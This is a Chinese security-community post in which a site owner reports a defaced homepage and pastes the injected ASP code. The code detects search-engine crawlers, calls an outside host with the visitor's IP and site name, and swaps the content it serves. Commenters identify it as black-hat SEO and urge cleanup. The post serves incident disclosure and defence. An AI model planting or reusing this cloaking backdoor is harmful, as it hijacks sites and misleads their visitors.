我被攻击了 入侵 恶意网站
网站首页篡改
mis_Wu 2019-01-29 10:00:00 540人浏览

<%

function isspider()

dim agent,searray,i

agent="agent:"&LCase(request.servervariables("http_user_agent"))

searray=array("bot","spider","sogou","yahoo","360","so","sm","Yisou")

isspider= false

for i=0 to ubound(searray)

 if (instr(agent,searray(i))>0) then isspider=true

next

end function

function getHTTPPage(url)

dim http

set http=createobject("MSXML2.XMLHTTP")

Http.open "GET",url,false

Http.send()

if Http.readystate<>4 then 

exit function

end if

getHTTPPage=bytes2BSTR(Http.responseBody)

set http=nothing

if err.number<>0 then err.Clear 

end function

Function bytes2BSTR(vIn)

dim wanyusoft_strReturn

dim i,ThisCharCode,NextCharCode

wanyusoft_strReturn = ""

For i = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn,i,1))

If ThisCharCode < &H80 Then

wanyusoft_strReturn = wanyusoft_strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn,i+1,1))

wanyusoft_strReturn = wanyusoft_strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

i = i + 1

End If

Next

bytes2BSTR = wanyusoft_strReturn

End Function

ip = Request.ServerVariables("Remote_ADDR")

host = Request.ServerVariables("HTTP_HOST")

info = getHTTPPage("http://www.xiaoba888.com:777/"+ip+"/"+host)

spider = isspider()

if info = "" then

if spider = false then

%>

<!--#include file="1.html" -->

<% 

else%>

<!--#include file="2.html" -->

<%

end if

else%>

<!--#include file="2.html" -->

<%

end if

%>

相关链接 :
评论 2
发表评论
AlickLIn 2019-02-18 16:07:36 回复
被做黑帽SEO了,注意清理后门、webshell啥的,服务器加固一下
匿名用户 2019-01-29 11:19:50 回复
从"bot","spider","sogou","yahoo","360","so","sm","Yisou"的搜索结果跳转过来会加载"http://www.xiaoba888.com:777/"+ip+"/"+host。
应该是做恶意推广的团伙搞的。还是要及时清理一下
奖励计划banner
今日推荐
10条IOC
【微步在线报告】TeamTNT团伙对Docker主机发起的攻击活动
微步情报局 IT行业
1条IOC
博彩网址
匿名用户 IT行业
3条IOC
我被搞了系列
weiwhy 媒体行业
1条IOC
赌博网站
匿名用户 IT行业
33条IOC
【微步在线报告】Gamaredon团伙再度优化攻击手法继续对乌克兰展开攻击
微步情报局 IT行业